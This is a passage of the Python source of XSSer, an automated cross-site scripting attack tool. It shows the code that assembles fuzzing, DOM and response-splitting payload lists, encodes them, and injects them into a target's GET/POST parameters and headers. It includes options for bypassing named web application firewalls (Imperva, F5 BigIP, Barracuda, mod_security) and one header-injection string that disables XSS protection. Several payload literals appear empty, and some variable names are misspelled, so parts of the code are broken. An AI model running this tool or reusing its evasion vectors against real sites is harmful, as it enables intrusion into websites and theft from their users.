#!/usr/bin/env python # -*- coding: utf-8 -*-" # vim: set expandtab tabstop=4 shiftwidth=4: """ This file is part of the XSSer project, https://xsser.03c8.net Copyright (c) 2010/2019 | psy xsser is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 3 of the License. xsser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with xsser; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser, random from random import randint from base64 import b64encode, b64decode import core.fuzzing import core.fuzzing.vectors import core.fuzzing.DCP import core.fuzzing.DOM import core.fuzzing.HTTPsr import core.fuzzing.heuristic from collections import defaultdict from itertools import islice, chain from urlparse import parse_qs, urlparse from core.curlcontrol import Curl from core.encdec import EncoderDecoder from core.options import XSSerOptions from core.dork import Dorker from core.crawler import Crawler from core.imagexss import ImageInjections from core.flashxss import FlashInjections from core.post.xml_exporter import xml_reporting from core.tokenhub import HubThread from core.reporter import XSSerReporter from core.threadpool import ThreadPool, NoResultsPending from core.update import Updater # set to emit debug messages about errors (0 = off). DEBUG = 0 class xsser(EncoderDecoder, XSSerReporter): """ XSSer application class """ def __init__(self, mothership=None): self._reporter = None self._reporters = [] self._landing = False self._ongoing_requests = 0 self._oldcurl = [] self._gtkdir = None self._webbrowser = webbrowser self.crawled_urls = [] self.checked_urls = [] self.successful_urls = [] self.urlmalformed = False self.search_engines = [] # available dorking search engines self.search_engines.append('bing') # [26/08/2019: OK!] self.search_engines.append('yahoo') # [26/08/2019: OK!] self.search_engines.append('startpage') # [26/08/2019: OK!] self.search_engines.append('duck') # [26/08/2019: OK!] #self.search_engines.append('google') #self.search_engines.append('yandex') self.user_template = None # wizard user template self.user_template_conntype = "GET" # GET by default self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site if not mothership: # no mothership so *this* is the mothership # start the communications hub and rock on! self.hub = None self.pool = ThreadPool(0) self.mothership = None self.final_attacks = {} else: self.hub = None self.mothership = mothership self.mothership.add_reporter(self) self.pool = ThreadPool(0) self.final_attacks = self.mothership.final_attacks # initialize the url encoder/decoder EncoderDecoder.__init__(self) # your unique real opponent self.time = datetime.datetime.now() # this payload comes with vector already.. self.DEFAULT_XSS_PAYLOAD = 'XSS' # to be or not to be... self.hash_found = [] self.hash_notfound = [] # other hashes self.hashed_injections={} self.extra_hashed_injections={} self.extra_hashed_vector_url = {} self.final_hashes = {} # final hashes used by each method # some counters for checker systems self.errors_isalive = 0 self.next_isalive = False self.flag_isalive_num = 0 self.rounds = 0 self.round_complete = 0 # some controls about targets self.urlspoll = [] # some statistics counters for connections self.success_connection = 0 self.not_connection = 0 self.forwarded_connection = 0 self.other_connection = 0 # some statistics counters for payloads self.xsr_injection = 0 self.xsa_injection = 0 self.coo_injection = 0 self.manual_injection = 0 self.auto_injection = 0 self.dcp_injection = 0 self.dom_injection = 0 self.httpsr_injection = 0 self.check_positives = 0 # some statistics counters for injections found self.xsr_found = 0 self.xsa_found = 0 self.coo_found = 0 self.manual_found = 0 self.auto_found = 0 self.dcp_found = 0 self.dom_found = 0 self.httpsr_found = 0 self.false_positives = 0 # some statistics counters for heuristic parameters self.heuris_hashes = [] self.heuris_backslash_found = 0 self.heuris_une_backslash_found = 0 self.heuris_dec_backslash_found = 0 self.heuris_backslash_notfound = 0 self.heuris_slash_found = 0 self.heuris_une_slash_found = 0 self.heuris_dec_slash_found = 0 self.heuris_slash_notfound = 0 self.heuris_mayor_found = 0 self.heuris_une_mayor_found = 0 self.heuris_dec_mayor_found = 0 self.heuris_mayor_notfound = 0 self.heuris_minor_found = 0 self.heuris_une_minor_found = 0 self.heuris_dec_minor_found = 0 self.heuris_minor_notfound = 0 self.heuris_semicolon_found = 0 self.heuris_une_semicolon_found = 0 self.heuris_dec_semicolon_found = 0 self.heuris_semicolon_notfound = 0 self.heuris_colon_found = 0 self.heuris_une_colon_found = 0 self.heuris_dec_colon_found = 0 self.heuris_colon_notfound = 0 self.heuris_doublecolon_found = 0 self.heuris_une_doublecolon_found = 0 self.heuris_dec_doublecolon_found = 0 self.heuris_doublecolon_notfound = 0 self.heuris_equal_found = 0 self.heuris_une_equal_found = 0 self.heuris_dec_equal_found = 0 self.heuris_equal_notfound = 0 # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity) self.verbose = 2 self.options = None def __del__(self): if not self._landing: self.land() def get_gtk_directory(self): if self._gtkdir: return self._gtkdir local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'gtk') if os.path.exists(local_path): self._gtkdir = local_path return self._gtkdir elif os.path.exists('/usr/share/xsser/gtk'): self._gtkdir = '/usr/share/xsser/gtk' return self._gtkdir def set_webbrowser(self, browser): self._webbrowser = browser def set_reporter(self, reporter): self._reporter = reporter def add_reporter(self, reporter): self._reporters.append(reporter) def remove_reporter(self, reporter): if reporter in self._reporters: self._reporters.remove(reporter) def generate_hash(self, attack_type='default'): """ Generate a new hash for a type of attack. """ return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest() def generate_numeric_hash(self): # 32 length as md5 """ Generate a new hash for numeric only XSS """ newhash = ''.join(random.choice('0123456789') for i in range(32)) return newhash def report(self, msg, level='info'): """ Report some error from the application. levels: debug, info, warning, error """ if self.verbose == 2: prefix = "" if level != 'info': prefix = "["+level+"] " print msg elif self.verbose: if level == 'error': sys.stdout.write("*") else: sys.stdout.write(".") for reporter in self._reporters: reporter.post(msg) if self._reporter: from twisted.internet import reactor reactor.callFromThread(self._reporter.post, msg) def set_options(self, options): """ Set xsser options """ self.options = options self._opt_request() def _opt_request(self): """ Pass on some properties to Curl """ options = self.options for opt in ['cookie', 'agent', 'referer',\ 'headers', 'atype', 'acred', 'acert', 'proxy', 'ignoreproxy', 'timeout', 'delay', 'tcp_nodelay', 'retries', 'xforw', 'xclient', 'threads', 'dropcookie', 'followred', 'fli', 'nohead', 'isalive', 'alt', 'altm', 'ald' ]: if hasattr(options, opt) and getattr(options, opt): setattr(Curl, opt, getattr(options, opt)) def get_payloads(self): """ Process payload options and make up the payload list for the attack. """ options = self.options # payloading sources for --auto payloads_fuzz = core.fuzzing.vectors.vectors if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz: self.options.fuzz = True # set a type for XSS auto-fuzzing vectors if options.fzz_info: fzz_payloads = [] for fuzz in payloads_fuzz: if not fuzz["browser"] == "[Not Info]": fzz_payloads.append(fuzz) payloads_fuzz = fzz_payloads # set a limit for XSS auto-fuzzing vectors if options.fzz_num: try: options.fzz_num = int(options.fzz_num) except: options.fzz_num = len(payloads_fuzz) fzz_num_payloads = [] fzz_vector = 0 for fuzz in payloads_fuzz: fzz_vector = fzz_vector + 1 if int(fzz_vector) < int(options.fzz_num)+1: fzz_num_payloads.append(fuzz) payloads_fuzz = fzz_num_payloads # set random order for XSS auto-fuzzing vectors if options.fzz_rand: try: from random import shuffle shuffle(payloads_fuzz) # shuffle paylods except: pass payloads_dcp = core.fuzzing.DCP.DCPvectors payloads_dom = core.fuzzing.DOM.DOMvectors payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}] # sustitute payload for hash to check for false positives self.hashed_payload = "XSS" checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}] # heuristic parameters heuristic_params = core.fuzzing.heuristic.heuristic_test def enable_options_heuristic(payloads): if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom return payloads if options.fuzz: payloads = payloads_fuzz if options.dcp: payloads = payloads + payloads_dcp if options.script: payloads = payloads + manual_payload if options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.script: payloads = payloads + manual_payload if options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payaloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads + payloads_httpsr if options.hash: payloads = checker_payload + payloads if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.dcp: payloads = payloads_dcp if options.script: payloads = payloads + manual_payload if options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + inducedcode if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.script: payloads = manual_payload if options.hash: payloads = checker_payload + payloads if options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads + payloads_httpsr if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: paylaods = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.inducedcode: payloads = payloads_httpsr if options.hash: payloads = checker_payload + payloads if options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.heuristic: payloads = heuristic_params if options.hash: payloads = checker_payload + payloads if options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads + payloads_dom elif options.dom: payloads = payloads_dom elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom: payloads = [{"payload":'">PAYLOAD', "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]" }] else: payloads = checker_payload return payloads def process_ipfuzzing(self, text): """ Mask ips in given text to DWORD """ ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text) for ip in ips: text = text.replace(ip, str(self._ipDwordEncode(ip))) return text def process_ipfuzzing_octal(self, text): """ Mask ips in given text to Octal """ ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text) for ip in ips: text = text.replace(ip, str(self._ipOctalEncode(ip))) return text def process_payloads_ipfuzzing(self, payloads): """ Mask ips for all given payloads using DWORD """ # ip fuzzing (DWORD) if self.options.Dwo: resulting_payloads = [] for payload in payloads: payload["payload"] = self.process_ipfuzzing(payload["payload"]) resulting_payloads.append(payload) return resulting_payloads return payloads def process_payloads_ipfuzzing_octal(self, payloads): """ Mask ips for all given payloads using OCTAL """ # ip fuzzing (OCTAL) if self.options.Doo: resulting_payloads = [] for payload in payloads: payload["payload"] = self.process_ipfuzzing_octal(payload["payload"]) resulting_payloads.append(payload) return resulting_payloads return payloads def get_query_string(self): """ Get the supplied query string. """ if self.options.postdata: return self.options.postdata elif self.options.getdata: return self.options.getdata return "" def attack_url(self, url, payloads, query_string): """ Attack the given url checking or not if is correct. """ if not self.options.nohead: for payload in payloads: self.rounds = self.rounds + 1 self.attack_url_payload(url, payload, query_string) else: hc = Curl() try: urls = hc.do_head_check([url]) except: self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n") return self.report("-"*50 + "\n") if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]: if str(hc.info()["http-code"]) in ["301"]: url = str(hc.info()["Location"]) payload = "" query_string = "" elif str(hc.info()["http-code"]) in ["302"]: url = url + "/" payload = "" query_string = "" self.success_connection = self.success_connection + 1 self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n") for payload in payloads: self.attack_url_payload(url, payload, query_string) else: if str(hc.info()["http-code"]) in ["405"]: self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n") self.success_connection = self.success_connection + 1 for payload in payloads: self.attack_url_payload(url, payload, query_string) else: self.not_connection = self.not_connection + 1 self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n") self.report("-"*50 + "\n") def not_keyword_exit(self): self.report("="*30) self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n") self.report("-"*25) self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n") self.report(" - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'") self.report(" - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n") self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n") self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo") self.report(" - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo") self.report(" - ex (Dorker): xsser -d 'news.php?id=' --Da") self.report(" - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n") self.report(" Or a mixture:\n") self.report(" - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload=''") self.report(" - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//(XSS)--;>'\n") self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo") self.report(" - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n") self.report("="*75 + "\n") if not self.options.xsser_gtk: sys.exit(2) else: pass def get_url_payload(self, url, payload, query_string, user_attack_payload): """ Attack the given url with the given payload """ options = self.options self._ongoing_attacks = {} if (self.options.xsa or self.options.xsr or self.options.coo): agent, referer, cookie = self._prepare_extra_attacks(payload) else: agents = [] # user-agents try: f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents except: f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing for line in f: agents.append(line) agent = random.choice(agents).strip() # set random user-agent referer = "" cookie = None if options.agent: agent = options.agent else: self.options.agent = agent if options.referer: referer = options.referer else: self.options.referer = referer if options.cookie: cookie = options.cookie else: self.options.cookie = cookie # get payload/vector payload_string = payload['payload'].strip() ### Anti-antiXSS exploits # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload if options.phpids065: payload_string = 32*payload_string + payload_string # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016) if options.phpids070: payload_string = '' # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016 if options.imperva: payload_string = '' # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016 if options.webknight: payload_string = '
' # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016 if options.f5bigip: payload_string = '' # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016 if options.barracuda: payload_string = '' # Apache / modsec [ALL] payload: special 18/02/2016 if options.modsec: payload_string = '' # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016 if options.quickdefense: payload_string = '
' # Firefox 12 (and below) # 09/2019 if options.firefox: payload_string = "" # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019 if options.chrome: payload_string = "" # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019 if options.iexplorer: payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a' # Opera 10.6 (but also IE6) # 09/2019 if options.opera: payload_string = "" # Substitute the attacking hash if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string: payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD) payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD) hashed_payload = payload_string # Imperva if options.imperva: hashed_payload = urllib.urlencode({'':hashed_payload}) hashed_payload = urllib.urlencode({'':hashed_payload}) #DoubleURL encoding hashed_payload = cgi.escape(hashed_payload) # + HTML encoding hashed_payload = unicode(hashed_payload) # + Unicode # Quick Defense if options.quickdefense: hashed_payload = unicode(hashed_payload) # + Unicode # apply user final attack url payload if user_attack_payload: hashed_vector_url = self.encoding_permutations(user_attack_payload) else: hashed_vector_url = self.encoding_permutations(hashed_payload) # replace special payload string also for extra attacks if self.extra_hashed_injections: hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD') for k, v in self.extra_hashed_injections.iteritems(): if v[1] in hashed_payload: self.extra_hashed_vector_url[k] = v[0], hashed_payload self.extra_hashed_injections = self.extra_hashed_vector_url if not options.getdata: # using GET as a single input (-u) target_url = url else: if not url.endswith("/") and not options.getdata.startswith("/"): url = url + "/" target_url = url + options.getdata p_uri = urlparse(target_url) uri = p_uri.netloc path = p_uri.path if not uri.endswith('/') and not path.startswith('/'): uri = uri + "/" if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword if not "XSS" in target_url: if not target_url.endswith("/"): target_url = target_url + "/XSS" else: target_url = target_url + "XSS" target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True) if self.options.script: if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params self.not_keyword_exit() if not target_params and not options.postdata: if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found! self.not_keyword_exit() else: # keyword found at target url (ex: https://target.com/XSS) if 'XSS' in target_url: url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection elif 'X1S' in target_url: url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection hashed_payload = payload_string.replace('XSS', url_orig_hash) if "[B64]" in hashed_payload: # [DCP Injection] dcp_payload = hashed_payload.split("[B64]")[1] dcp_preload = hashed_payload.split("[B64]")[0] dcp_payload = b64encode(dcp_payload) hashed_payload = dcp_preload + dcp_payload self.hashed_injections[url_orig_hash] = target_url if user_attack_payload: pass else: hashed_vector_url = self.encoding_permutations(hashed_payload) target_params[''] = hashed_vector_url # special target_param when XSS only at target_url target_url_params = urllib.urlencode(target_params) if not uri.endswith('/') and not path.startswith('/'): uri = uri + "/" dest_url = p_uri.scheme + "://" + uri + path if not "XSS" in dest_url: if not dest_url.endswith("/"): dest_url = dest_url + "/" + hashed_vector_url else: dest_url = dest_url + hashed_vector_url else: if 'XSS' in dest_url: dest_url = dest_url.replace('XSS', hashed_vector_url) if 'X1S' in dest_url: dest_url = dest_url.replace('X1S', hashed_vector_url) else: if 'XSS' in target_url: url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection elif 'X1S' in target_url: url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection hashed_payload = payload_string.replace('XSS', url_orig_hash) if "[B64]" in hashed_payload: # [DCP Injection] dcp_payload = hashed_payload.split("[B64]")[1] dcp_preload = hashed_payload.split("[B64]")[0] dcp_payload = b64encode(dcp_payload) hashed_payload = dcp_preload + dcp_payload self.hashed_injections[url_orig_hash] = target_url if user_attack_payload: pass else: hashed_vector_url = self.encoding_permutations(hashed_payload) target_params[''] = hashed_vector_url # special target_param when XSS only at target_url target_url_params = urllib.urlencode(target_params) if not uri.endswith('/') and not path.startswith('/'): uri = uri + "/" dest_url = p_uri.scheme + "://" + uri + path if 'XSS' in dest_url: dest_url = dest_url.replace('XSS', hashed_vector_url) if 'X1S' in dest_url: dest_url = dest_url.replace('X1S', hashed_vector_url) dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params else: if not options.postdata: r = 0 for key, value in target_params.iteritems(): # parse params searching for keywords for v in value: if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload if v == 'XSS': url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection elif v == 'X1S': url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection hashed_payload = payload_string.replace('XSS', url_orig_hash) if "[B64]" in hashed_payload: # [DCP Injection] dcp_payload = hashed_payload.split("[B64]")[1] dcp_preload = hashed_payload.split("[B64]")[0] dcp_payload = b64encode(dcp_payload) hashed_payload = dcp_preload + dcp_payload self.hashed_injections[url_orig_hash] = key if user_attack_payload: pass else: hashed_vector_url = self.encoding_permutations(hashed_payload) target_params[key] = hashed_vector_url r = r + 1 else: if self.options.xsa or self.options.xsr or self.options.coo: url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection self.hashed_injections[url_orig_hash] = key target_params[key] = v r = r + 1 else: target_params[key] = v if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling: self.not_keyword_exit() payload_url = query_string.strip() + hashed_vector_url target_url_params = urllib.urlencode(target_params) dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params else: # using POST provided by parameter (-p) target_params = parse_qs(query_string, keep_blank_values=True) r = 0 for key, value in target_params.iteritems(): # parse params searching for keywords for v in value: if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload if v == 'XSS': url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection elif v == 'X1S': url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection hashed_payload = payload_string.replace('XSS', url_orig_hash) if "[B64]" in hashed_payload: # [DCP Injection] dcp_payload = hashed_payload.split("[B64]")[1] dcp_preload = hashed_payload.split("[B64]")[0] dcp_payload = b64encode(dcp_payload) hashed_payload = dcp_preload + dcp_payload self.hashed_injections[url_orig_hash] = key if user_attack_payload: pass else: hashed_vector_url = self.encoding_permutations(hashed_payload) target_params[key] = hashed_vector_url r = r + 1 else: if self.options.xsa or self.options.xsr or self.options.coo: url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection self.hashed_injections[url_orig_hash] = key target_params[key] = v r = r + 1 else: target_params[key] = v if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling: self.not_keyword_exit() target_url_params = urllib.urlencode(target_params) dest_url = target_url_params self._ongoing_attacks['url'] = url_orig_hash return dest_url, agent, referer, cookie def attack_url_payload(self, url, payload, query_string): if not self.pool: pool = self.mothership.pool else: pool = self.pool c = Curl() if self.options.getdata or not self.options.postdata: dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None) def _cb(request, result): self.finish_attack_url_payload(c, request, result, payload, query_string, url, dest_url) _error_cb = self.error_attack_url_payload def _error_cb(request, error): self.error_attack_url_payload(c, url, request, error) c.agent = agent c.referer = referer c.cookie = cookie if " " in dest_url: # parse blank spaces dest_url = dest_url.replace(" ", "+") pool.addRequest(c.get, [[dest_url]], _cb, _error_cb) self._ongoing_requests += 1 if self.options.postdata: dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None) def _cb(request, result): self.finish_attack_url_payload(c, request, result, payload, query_string, url, dest_url) _error_cb = self.error_attack_url_payload def _error_cb(request, error): self.error_attack_url_payload(c, url, request, error) dest_url = dest_url.strip().replace("/", "", 1) c.agent = agent c.referer = referer c.cookie = cookie pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb) self._ongoing_requests += 1 def error_attack_url_payload(self, c, url, request, error): self._ongoing_requests -= 1 for reporter in self._reporters: reporter.mosquito_crashed(url, str(error[0])) dest_url = request.args[0] self.report("Failed attempt (URL Malformed!?): " + url + "\n") self.urlmalformed = True if self.urlmalformed == True and self.urlspoll[0] == url: self.land() self.report(str(error[0])) if self.options.verbose: traceback.print_tb(error[2]) c.close() del c return def finish_attack_url_payload(self, c, request, result, payload, query_string, url, dest_url): self.round_complete = self.round_complete + 1 self.report("="*75) self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time)) self.report("="*75) self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n") self._ongoing_requests -= 1 # adding constant head check number flag if self.options.isalive: self.flag_isalive_num = int(self.options.isalive) if self.options.isalive <= 0: pass elif self.options.isalive and not self.options.nohead: self.errors_isalive = self.errors_isalive + 1 if self.errors_isalive > self.options.isalive: pass else: self.report("---------------------") self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n") if self.next_isalive == True: hc = Curl() self.next_isalive = False try: urls = hc.do_head_check([url]) except: print "[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n" self.errors_isalive = 0 return if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]: print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n" print "- Your target still Alive: " + "(" + url + ")" print "- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n" print " - your injections are failing: normal :-)" print " - maybe exists some IPS/NIDS/... systems blocking your requests!\n" else: if str(hc.info()["http-code"]) == "0": print "\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n" else: print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n" print "- Your target " + "(" + url + ")" + " looks that is NOT alive" print "- If you are receiving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n" self.errors_isalive = 0 else: if str(self.errors_isalive) >= str(self.options.isalive): self.report("---------------------") self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n") self.next_isalive = True self.options.isalive = self.flag_isalive_num else: if self.options.isalive and self.options.nohead: self.report("---------------------") self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive ) to control this checker limit manually") self.report("---------------------") # check results an alternative url, choosing method and parameters, or not if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]: self.options.altm = "GET" if self.options.altm == "post": self.options.altm = "POST" if self.options.alt == None: pass else: self.report("="*45) self.report("[+] Checking Response Options:", "\n") self.report("[+] Url:", self.options.alt) self.report("[-] Method:", self.options.altm) if self.options.ald: self.report("[-] Parameter(s):", self.options.ald, "\n") else: self.report("[-] Parameter(s):", query_string, "\n") if c.info()["http-code"] in ["200", "302", "301"]: if self.options.statistics: self.success_connection = self.success_connection + 1 self._report_attack_success(c, dest_url, payload, query_string, url) else: self._report_attack_failure(c, dest_url, payload, query_string, url) # checking response results if self.options.alt == None: pass else: self.report("="*45) self.report("[+] Checking Response Results:", "\n") self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url") if 'PAYLOAD' in payload['payload']: user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash) if self.options.ald: query_string = self.options.ald if "VECTOR" in self.options.alt: dest_url = self.options.alt else: if not dest_url.endswith("/"): dest_url = dest_url + "/" if self.options.altm == 'POST': dest_url = "" + query_string + user_attack_payload dest_url = dest_url.strip().replace("/", "", 1) data = c.post(url, dest_url) else: dest_url = self.options.alt + query_string + user_attack_payload c.get(dest_url) # perform check response injection if c.info()["http-code"] in ["200", "302", "301"]: if self.options.statistics: self.success_connection = self.success_connection + 1 self._report_attack_success(c, dest_url, payload, query_string, url) else: self._report_attack_failure(c, dest_url, payload, query_string, url) c.close() del c def encoding_permutations(self, enpayload_url): """ perform encoding permutations on the url and query_string. """ options = self.options if options.Cem: enc_perm = options.Cem.split(",") for _enc in enc_perm: enpayload_url = self.encmap[_enc](enpayload_url) else: for enctype in self.encmap.keys(): if getattr(options, enctype): enpayload_url = self.encmap[enctype](enpayload_url) return enpayload_url def _report_attack_success(self, curl_handle, dest_url, payload,\ query_string, orig_url): """ report connection success of an attack """ if not orig_url in self.successful_urls: self.successful_urls.append(orig_url) options = self.options current_hashes = [] # to check for ongoing hashes if payload['browser'] == "[Heuristic test]": for key, value in self.hashed_injections.iteritems(): if str(key) in dest_url: if key not in current_hashes: self.final_hashes[key] = value current_hashes.append(key) elif self.options.hash: for key, value in self.hashed_injections.iteritems(): self.final_hashes[key] = value current_hashes.append(key) else: self.report("-"*45) self.report("\n[!] Hashing: \n") for key, value in 